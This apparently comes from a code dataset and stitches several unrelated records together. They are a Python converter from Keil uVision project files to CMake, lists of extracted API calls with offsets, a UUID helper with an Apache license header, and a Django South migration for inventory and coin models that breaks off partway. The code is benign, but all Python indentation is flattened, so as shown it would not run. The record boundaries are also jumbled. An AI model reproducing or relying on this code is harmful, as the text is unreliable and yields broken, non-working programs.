def strict_hex(element: etree.ElementBase, name: str) -> int:
value = text(element, name)
if not value.startswith("0x"):
raise ValueError(f"'{value}' (of {name}) is not valid hexadecimal value")
return int(value, 16)
# endregion XML parsing helper functions
@dataclass
class UVisionProject:
project_file_path: str
project_options_path: str
# region Project File
targets: List[Target]
# endregion Project File
# region Project Options
groups: List[Group]
"""Groups of files, as shown in the Project Window file browser."""
# endregion Project Options
@classmethod
def new(cls, project_file_path: str) -> 'UVisionProject':
fp_base = os.path.splitext(project_file_path)[0]
project_file_path = fp_base + ".uvprojx"
project_options_path = fp_base + ".uvoptx"
with open(project_file_path) as f:
# noinspection PyProtectedMember
xproj: etree._Element = etree.parse(f).getroot()
with open(project_options_path) as f:
# noinspection PyProtectedMember
xopt: etree._Element = etree.parse(f).getroot()
# region Project File
if xproj.tag != "Project":
raise ValueError("Invalid uVision Project File XML file")
# noinspection PyCallByClass,SpellCheckingInspection
targets = [
Target(
name=text(target, "TargetName"),
toolset=Target.Toolset(
number=strict_hex(target, "ToolsetNumber"),
name=text(target, "ToolsetName")
),
compiler=Target.Compiler(
cc=text(target, "pCCUsed", nullable=True),
ac6=strict_bool(target, "uAC6")
),
options=next(
# There is always only one package, but using generator is clean and
# effective way of creating an inline local variable.
Target.Options(
common=next(
Target.Options.Common(
device=text(tco, "Device"),
vendor=text(tco, "Vendor"),
pack_id=text(tco, "PackID"),
pack_url=text(tco, "PackURL"),
cpu=text(tco, "Cpu"),
device_id=text(tco, "DeviceId"),
register_file=text(tco, "RegisterFile")
) for tco in to.xpath("TargetCommonOption")
),
properties=next(
Target.Options.Properties(
use_cpp_compiler=strict_bool(tcp, "UseCPPCompiler"),
) for tcp in to.xpath("CommonProperty")
)
) for to in target.xpath("TargetOption")
),
build=next(
Target.Build(
misc=Target.Build.Misc(
cpu_type=text(to_taa, "ArmAdsMisc/AdsCpuType"),
memories=[
Target.Build.Misc.Memory(
name=memory.tag,
type=Target.Build.Misc.Memory.Type(int(text(memory, "Type"))),
start=strict_hex(memory, "StartAddress"),
size=strict_hex(memory, "Size")
) for memory in to_taa.xpath("ArmAdsMisc/OnChipMemories/*")
]
),
c=next(
Target.Build.C(
optimization=int(text(to_taa_c, "Optim")),
strict=strict_bool(to_taa_c, "Strict"),
c99=strict_bool(to_taa_c, "uC99"),
gnu=strict_bool(to_taa_c, "uGnu"),
misc=[
mc.strip() for mc in text(to_taa_c, "VariousControls/MiscControls").split(",")
],
defines=[
mc.strip() for mc in text(to_taa_c, "VariousControls/Define").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_c, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in text(to_taa_c, "VariousControls/IncludePath").split(";")
]
) for to_taa_c in to_taa.xpath("Cads")
),
asm=next(
Target.Build.Asm(
misc=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/MiscControls") or "").split(",")
],
defines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Define") or "").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/IncludePath") or "").split(";")
]
) for to_taa_a in to_taa.xpath("Aads")
),
ld=next(
Target.Build.Linker(
text_address_range=strict_hex(to_taa_ld, "TextAddressRange"),
data_address_range=strict_hex(to_taa_ld, "DataAddressRange"),
misc=[
mc.strip() for mc in
text(to_taa_ld, "Misc").split(",") # TODO: Delimiter unknown
]
) for to_taa_ld in to_taa.xpath("LDads")
)
) for to_taa in target.xpath("TargetOption/TargetArmAds")
),
groups=[
Target.Group(
name=text(group, "GroupName"),
files=[
Target.File(
name=text(file, "FileName"),
type=FileType(int(text(file, "FileType"))),
path=text(file, "FilePath"),
include_in_build=strict_bool(file, "FileOption/CommonProperty/IncludeInBuild",
nullable=True),
always_build=strict_bool(file, "FileOption/CommonProperty/AlwaysBuild",
nullable=True, true_value="2")
) for file in group.xpath("Files/File")
]
) for group in target.xpath("Groups/Group")
]
) for target in xproj.xpath("Targets/Target")
]
# region RTE
# noinspection PyCallByClass,PyTypeChecker
rte = RTE(
packages=[
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# Using generator and list only for local variable
version_match_mode=next(RTE.TargetInfo.VersionMatchMode(vmm) if vmm else None
for vmm in [text(ti, "versionMatchMode", True, True)])
) for ti in package.xpath("targetInfos/targetInfo")
]
) for package in xproj.xpath("RTE/packages/package")
],
components=[
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=next(
# There is always only one package, but using generator is clean and
# effective way of creating an inline local variable.
# This new instance of package will be replaced below with reference to an actual matching
# instance of the package from rte.packages.
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=None
) for package in component.xpath("package")
),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# TODO: Handle nullable
# RTE.TargetInfo.VersionMatchMode(text(ti, "versionMatchMode", True, True))
version_match_mode=None
) for ti in component.xpath("targetInfos/targetInfo")
]
) for component in xproj.xpath("RTE/components/component")
],
files=[
RTE.File(
attr=RTE.File.Attribute(text(file, "attr", True)),
category=RTE.File.Category(text(file, "category", True)),
condition=text(file, "condition", True, True),
name=text(file, "name", True),
version=text(file, "version", True),
instance=text(file, "instance"),
component=next(
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=None,
target_infos=None
) for component in file.xpath("component")
),
package=None, # TODO
target_infos=None, # TODO
) for file in xproj.xpath("RTE/files/file")
]
)
# TODO: Connect actual references of the rte.packages and rte.packages.target_infos
for component in rte.components:
cp = component.package
component.package = None
cp.target_infos = None
for package in rte.packages:
# Temporally remove target_infos to enable usage of equality operator.
pti = package.target_infos
package.target_infos = None
if cp == package:
component.package = package
package.target_infos = pti
break
package.target_infos = pti
# endregion RTE
# endregion Project File
# region Project Options
if xopt.tag != "ProjectOpt":
raise ValueError("Invalid uVision Project Options XML file")
groups: List[Group] = []
for group in xopt.xpath("Group"):
group_name = text(group, "GroupName")
# Find this group in the Project File
xproj_group = next(g for g in next(iter(targets)).groups if (g.name == group_name))
# Find all files in this group and also in the Project File
files: List[File] = []
for file in group.xpath("File"):
file_type = FileType(int(text(file, "FileType")))
file_name = text(file, "FilenameWithoutPath")
xproj_file = next(f for f in xproj_group.files if (f.type == file_type and f.name == file_name))
files.append(File(
group_number=int(text(file, "GroupNumber")),
number=int(text(file, "FileNumber")),
type=file_type,
expanded=strict_bool(file, "tvExp"),
include_in_build=xproj_file.include_in_build,
always_build=xproj_file.always_build,
tv_exp_opt_dlg=strict_bool(file, "tvExpOptDlg"),
dave2=strict_bool(file, "bDave2"),
path=text(file, "PathWithFileName"),
filename=file_name,
rte_flag=strict_bool(file, "RteFlg"),
shared=strict_bool(file, "bShared")
))
groups.append(Group(
name=group_name,
expanded=strict_bool(group, "tvExp"),
tv_exp_opt_dlg=strict_bool(group, "tvExpOptDlg"),
cb_sel=strict_bool(group, "cbSel"),
rte_flag=strict_bool(group, "RteFlg"),
files=files
))
# There is no more *currently relevant* data in the Project Options file.
# endregion Project Options
# Add RTE files to the file groups to actually match the Project Window file browser.
for file in rte.files:
# Find the group to which this file belongs to (there shall be one and only one).
group = None
group_number = 1
for group_number, group in enumerate(groups, 1):
if group.files and group.files[0].group_number != group_number:
warnings.warn(f"Inconsistent group number {group.files[0].group_number} for group {group.name}"
f" (expected to be {group_number})")
if group.rte_flag and group.name.strip(":") == file.component.class_:
break
filename = os.path.basename(file.instance)
# Detect file type (this information is not provided for RTE files)
if filename.endswith(".s"):
file_type = FileType.ASM_SOURCE
elif filename.endswith(".c"):
file_type = FileType.C_SOURCE
elif filename.endswith(".cpp"):
file_type = FileType.CPP_SOURCE
elif filename.endswith(".h"):
file_type = FileType.TEXT_DOCUMENT
else:
warnings.warn(f"Unknown RTE file type '{file.instance}': {file}")
continue
group.files.append(File(
group_number=group_number,
number=max(f.number for g in groups for f in g.files) + 1,
type=file_type,
expanded=False,
include_in_build=True, # TODO: This information is available for RTE files
always_build=None,
tv_exp_opt_dlg=False, # TODO
dave2=False, # TODO
path=file.instance,
filename=os.path.basename(file.instance),
rte_flag=True,
shared=False
))
return cls(
project_file_path=project_file_path,
project_options_path=project_options_path,
targets=targets,
groups=groups
)
def source_files(self) -> Iterator[Tuple[File, Optional[Language], Optional[str]]]:
"""
Get all files grouped by the file type with group names as a comments.
"""
# Add source files
for group in self.groups:
comment = group.name
if group.rte_flag:
# RTE groups start with double colon (::).
comment = "RTE" + comment
# Group files by type and add one comment for every file type as they are in the separate sections.
files: Dict[Union[Language, None], List[File]] = defaultdict(list)
for file in group.files:
if file.type == FileType.ASM_SOURCE:
lang = Language.ASM
elif file.type == FileType.C_SOURCE:
lang = Language.C
elif file.type == FileType.TEXT_DOCUMENT:
lang = None
else:
warnings.warn(f"Unsupported file type: {file.type} for {file}")
continue
files[lang].append(file)
for lang, files in files.items():
comment_per_type = comment
for file in files:
yield file, lang, comment_per_type
comment_per_type = None
class CMake:
@dataclass
class String:
value: str
"""The actual string value."""
languages: Set[Language]
"""Set of all build configs in which this value is present."""
common: bool = False
comment: Optional[str] = None
"""Comment which will be added to the line before"""
def __eq__(self, o: 'CMake.String') -> bool:
if isinstance(o, type(self)):
return self.value == o.value
elif isinstance(o, str):
return self.value == o
return NotImplemented
def __init__(self) -> None:
self.include_paths: List[CMake.String] = []
self.defines: List[CMake.String] = []
self.undefines: List[CMake.String] = []
self.source_file_paths: List[CMake.String] = []
self.other_file_paths: List[CMake.String] = []
@classmethod
def _get(cls, lst: List[String], obj: str) -> String:
"""Get existing object from the list or append a new one to the end."""
try:
# noinspection PyTypeChecker
itm = lst[lst.index(obj)]
except ValueError:
# noinspection PyCallByClass
itm = cls.String(obj, set())
lst.append(itm)
return itm
@classmethod
def _add_values(cls, where: List[String], values: Union[str, Iterable[str]],
languages: Union[Language, Collection[Language], None], comment: Optional[str] = None) -> None:
if isinstance(languages, Language):
languages = [languages]
for val in values:
obj = cls._get(where, val)
if comment is not None:
# Add comment to the first value only
obj.comment = comment
comment = None
if languages:
obj.languages.update(languages)
@staticmethod
def _clean_paths(paths: Union[str, Iterable[str]]) -> List[str]:
if isinstance(paths, (str, Path)):
paths = [paths]
return [Path(p).as_posix() for p in map(os.path.normpath, paths)]
def add_include_paths(self, paths: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.include_paths, self._clean_paths(paths), languages, comment)
def add_defines(self, defines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.defines, defines, languages, comment)
def add_undefines(self, undefines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.undefines, undefines, languages, comment)
def add_source_files(self, paths: Union[None, str, Iterable[str]],
languages: Union[Language, Collection[Language], None],
comment: str = None, include_in_build: bool = True) -> None:
paths = self._clean_paths(paths)
# If file is not included in the build, comment it
if include_in_build is False:
paths = ["# " + path for path in paths]
self._add_values(self.source_file_paths if languages else self.other_file_paths, paths, languages, comment)
def add_other_files(self, paths: Union[str, Iterable[str]], comment: str = None) -> None:
self.add_source_files(paths, None, comment)
def check_common(self) -> Set[Language]:
"""
Check which properties are common to all language configurations.
:return: Set of all used languages (languages with at least one property)
"""
all_props = (self.include_paths, self.defines, self.undefines, self.source_file_paths)
# Get all of the defined languages used
languages = {lang
for props in all_props
for prop in props
for lang in prop.languages}
for props in all_props:
for prop in props:
prop.common = (prop.languages == languages)
return languages
def __str__(self) -> str:
languages = sorted(self.check_common(), key=operator.attrgetter('value'))
ret_str = [
"# Made with CMake <> uVision project file synchronizer"
"# https://github.com/bojanpotocnik/cmake-uvision-syncer"
]
# Set of the build properties
prop_sets: List[Tuple[str, str, List[CMake.String], str]] = [
("definitions", "DEFINES", self.defines, "-D"),
("un-defines", "UNDEFINES", self.undefines, ""),
("include directories", "INCLUDE_DIRS", self.include_paths, ""),
("source files", "SOURCES", self.source_file_paths, ""),
]
# Set of the language configs per build property
sub_prop_sets: List[Tuple[str, str, Callable[[CMake.String], bool]]] = [
("Common", "COMMON", lambda prop: prop.common),
*((lang.value + " specific", lang.name,
lambda prop, lang_=lang: (not prop.common) and (lang_ in prop.languages))
for lang in languages)
]
def _add_section_files(comment: str, var_name: str, value_iterator: Iterable[CMake.String],
value_prefix: str = "") -> str:
s = (f"# {comment}\n"
f"set({var_name}")
value_str = ''
for value in value_iterator:
if value.comment is not None:
value_str += f"\n\t# {value.comment}"
value_str += f"\n\t{value_prefix}{value.value}"
if len(value_str) is not 0:
return s + value_str + "\n)"
else:
return None
for section_comment, section_var_prefix, section_props, val_prefix in prop_sets:
ss_str = []
for prop_set_comment, var_suffix, filter_fun in sub_prop_sets:
section_files = _add_section_files(
comment=f"{prop_set_comment} {section_comment}",
var_name=f"{section_var_prefix}_{var_suffix}",
value_iterator=filter(filter_fun, section_props),
value_prefix=val_prefix
)
if section_files is not None:
ss_str.append(section_files)
ret_str.append("\n\n".join(ss_str))
other_files = _add_section_files(
comment="Other files",
var_name="OTHER_FILES",
value_iterator=self.other_file_paths
)
if other_files is not None:
ret_str.append(other_files)
return "\n\n\n".join(ret_str)
def main() -> None:
# region Parse arguments
arguments = docopt(__doc__)
project_path: str = arguments["<project>"] or "."
if not os.path.isfile(project_path):
with os.scandir(project_path) as dirs: # type: Iterator[DirEntry]
projects = [de.path for de in dirs if (de.is_file() and (os.path.splitext(de.name)[1] == ".uvprojx"))]
if not projects:
raise FileNotFoundError(f"Could not find any .uvprojx file in '{project_path}'")
elif len(projects) > 1:
# Choose the latest file by modification time.
project_path = max(projects, key=os.path.getmtime)
else:
project_path = projects[0]
project_path = os.path.realpath(project_path)
# endregion Parse arguments
print(f"Using µVision5 Project File '{project_path}'")
# Parse uVision project XML files
uvp = UVisionProject.new(project_path)
# Generate CMake file and populate it with information from uVision project
cmake = CMake()
# Add Assembler properties
cmake.add_include_paths(uvp.targets[0].build.asm.include_paths, Language.ASM)
cmake.add_defines(uvp.targets[0].build.asm.defines, Language.ASM)
cmake.add_undefines(uvp.targets[0].build.asm.undefines, Language.ASM)
# Add C properties
cmake.add_include_paths(uvp.targets[0].build.c.include_paths, Language.C)
cmake.add_defines(uvp.targets[0].build.c.defines, Language.C)
cmake.add_undefines(uvp.targets[0].build.c.undefines, Language.C)
# Add source and other files
for file, lang, comment in uvp.source_files():
cmake.add_source_files(file.path, lang, comment, file.include_in_build)
fp_proj_cmake = os.path.join(os.path.dirname(uvp.project_file_path),
os.path.splitext(os.path.basename(uvp.project_file_path))[0] + ".cmake")
with open(fp_proj_cmake, 'w') as f:
print(cmake, file=f)
print(f"Generated CMake file '{fp_proj_cmake}'")
if __name__ == "__main__":
main()
| [
"operator.attrgetter",
"pathlib.Path",
"os.scandir",
"os.path.splitext",
"lxml.etree.parse",
"os.path.realpath",
"os.path.dirname",
"os.path.isfile",
"collections.defaultdict",
"os.path.basename",
"warnings.warn",
"docopt.docopt"
]
| [((31964, 31979), 'docopt.docopt', 'docopt', (['__doc__'], {}), '(__doc__)\n', (31970, 31979), False, 'from docopt import docopt\n'), ((32611, 32641), 'os.path.realpath', 'os.path.realpath', (['project_path'], {}), '(project_path)\n', (32627, 32641), False, 'import os\n'), ((32046, 32074), 'os.path.isfile', 'os.path.isfile', (['project_path'], {}), '(project_path)\n', (32060, 32074), False, 'import os\n'), ((33612, 33650), 'os.path.dirname', 'os.path.dirname', (['uvp.project_file_path'], {}), '(uvp.project_file_path)\n', (33627, 33650), False, 'import os\n'), ((8140, 8175), 'os.path.splitext', 'os.path.splitext', (['project_file_path'], {}), '(project_file_path)\n', (8156, 8175), False, 'import os\n'), ((22374, 22405), 'os.path.basename', 'os.path.basename', (['file.instance'], {}), '(file.instance)\n', (22390, 22405), False, 'import os\n'), ((24352, 24369), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (24363, 24369), False, 'from collections import defaultdict\n'), ((32089, 32113), 'os.scandir', 'os.scandir', (['project_path'], {}), '(project_path)\n', (32099, 32113), False, 'import os\n'), ((29383, 29411), 'operator.attrgetter', 'operator.attrgetter', (['"""value"""'], {}), "('value')\n", (29402, 29411), False, 'import operator\n'), ((8404, 8418), 'lxml.etree.parse', 'etree.parse', (['f'], {}), '(f)\n', (8415, 8418), False, 'from lxml import etree\n'), ((8556, 8570), 'lxml.etree.parse', 'etree.parse', (['f'], {}), '(f)\n', (8567, 8570), False, 'from lxml import etree\n'), ((22072, 22210), 'warnings.warn', 'warnings.warn', (['f"""Inconsistent group number {group.files[0].group_number} for group {group.name} (expected to be {group_number})"""'], {}), "(\n f'Inconsistent group number {group.files[0].group_number} for group {group.name} (expected to be {group_number})'\n )\n", (22085, 22210), False, 'import warnings\n'), ((27135, 27142), 'pathlib.Path', 'Path', (['p'], {}), '(p)\n', (27139, 27142), False, 'from pathlib import Path\n'), ((33702, 33741), 'os.path.basename', 'os.path.basename', (['uvp.project_file_path'], {}), '(uvp.project_file_path)\n', (33718, 33741), False, 'import os\n'), ((23462, 23493), 'os.path.basename', 'os.path.basename', (['file.instance'], {}), '(file.instance)\n', (23478, 23493), False, 'import os\n'), ((22881, 22946), 'warnings.warn', 'warnings.warn', (['f"""Unknown RTE file type \'{file.instance}\': {file}"""'], {}), '(f"Unknown RTE file type \'{file.instance}\': {file}")\n', (22894, 22946), False, 'import warnings\n'), ((24724, 24787), 'warnings.warn', 'warnings.warn', (['f"""Unsupported file type: {file.type} for {file}"""'], {}), "(f'Unsupported file type: {file.type} for {file}')\n", (24737, 24787), False, 'import warnings\n'), ((32220, 32245), 'os.path.splitext', 'os.path.splitext', (['de.name'], {}), '(de.name)\n', (32236, 32245), False, 'import os\n')] |
#!/usr/bin/python
"""
(C) Copyright 2018 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
"""
import ctypes
import uuid
def c_uuid_to_str(uuid):
""" utility function to convert a C uuid into a standard string format """
uuid_str = '{:02X}{:02X}{:02X}{:02X}-{:02X}{:02X}-{:02X}{:02X}-{:02X}'\
'{:02X}-{:02X}{:02X}{:02X}{:02X}{:02X}{:02X}'.format(
uuid[0], uuid[1], uuid[2], uuid[3], uuid[4], uuid[5],
uuid[6], uuid[7], uuid[8], uuid[9], uuid[10], uuid[11],
uuid[12], uuid[13], uuid[14], uuid[15])
return uuid_str
def c_uuid(p_uuid, c_uuid):
""" utility function to create a UUID in C format from a python UUID """
hexstr = p_uuid.hex
for i in range(0, 31, 2):
c_uuid[int(i/2)] = int(hexstr[i:i+2], 16)
def str_to_c_uuid(uuidstr):
""" utility function to convert string format uuid to a C uuid """
uuidstr2 = '{' + uuidstr + '}'
puuid = uuid.UUID(uuidstr2)
cuuid = (ctypes.c_ubyte * 16)()
c_uuid(puuid, cuuid)
return cuuid
| [
"uuid.UUID"
]
| [((1866, 1885), 'uuid.UUID', 'uuid.UUID', (['uuidstr2'], {}), '(uuidstr2)\n', (1875, 1885), False, 'import uuid\n')] |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ProductType'
db.create_table('inventory_producttype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('inventory', ['ProductType'])
# Adding model 'Product'
db.create_table('inventory_product', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('description', self.gf('django.db.models.fields.TextField')()),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'])),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'])),
('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('weight', self.gf('django.db.models.fields.DecimalField')(default='0', max_digits=11, decimal_places=2)),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['inventory.ProductType'], null=True, blank=True)),
))
db.send_create_signal('inventory', ['Product'])
# Adding model 'Coin'
db.create_table('inventory_coin', (
('producttype_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['inventory.ProductType'], unique=True, primary_key=True)),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'], null=True, blank=True)),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'], null=True, blank=True)),
('country_code', self.gf('django.db.models.fields.CharField')(default='us', max_length=2)),
('pcgs_number', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('description', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('year_issued', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('actual_year', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('denomination', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('major_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('die_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('prefix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('suffix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('sort_order', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('heading', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety_2', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('additional_data', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('last_update', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
))
db.send_create_signal('inventory', ['Coin'])
def backwards(self, orm):
# Deleting model 'ProductType'
db.delete_table('inventory_producttype')
# Deleting model 'Product'
db.delete_table('inventory_product')
# Deleting model 'Coin'
db.delete_table('inventory_coin')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('<PASSWORD>', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'inventory.coin': {
'Meta': {'object_name': 'Coin', '_ormbases': ['inventory.ProductType']},
'actual_year': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"}),
'additional_data': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']", 'null': 'True', 'blank': 'True'}),
'country_code': ('django.db.models.fields.CharField', [], {'default': "'us'", 'max_length': '2'}),
'denomination': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'die_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'heading': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety_2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'major_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'pcgs_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'producttype_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['inventory.ProductType']", 'unique': 'True', 'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']", 'null': 'True', 'blank': 'True'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'year_issued': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"})
},
'inventory.product': {
'Meta': {'object_name': 'Product'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']"}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['inventory.ProductType']", 'null': 'True', 'blank': 'True'}),
'weight': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '11', 'decimal_places': '2'})
},
'inventory.producttype': {
'Meta': {'object_name': 'ProductType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'market.marketcategory': {
'Meta': {'object_name': 'MarketCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'db_index': 'True'})
},
'market.marketplace': {
'Meta': {'object_name': 'MarketPlace'},
'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '92'})
},
'market.marketsubcategory': {
'Meta': {'unique_together': "(('parent', 'slug'),)", 'object_name': 'MarketSubCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
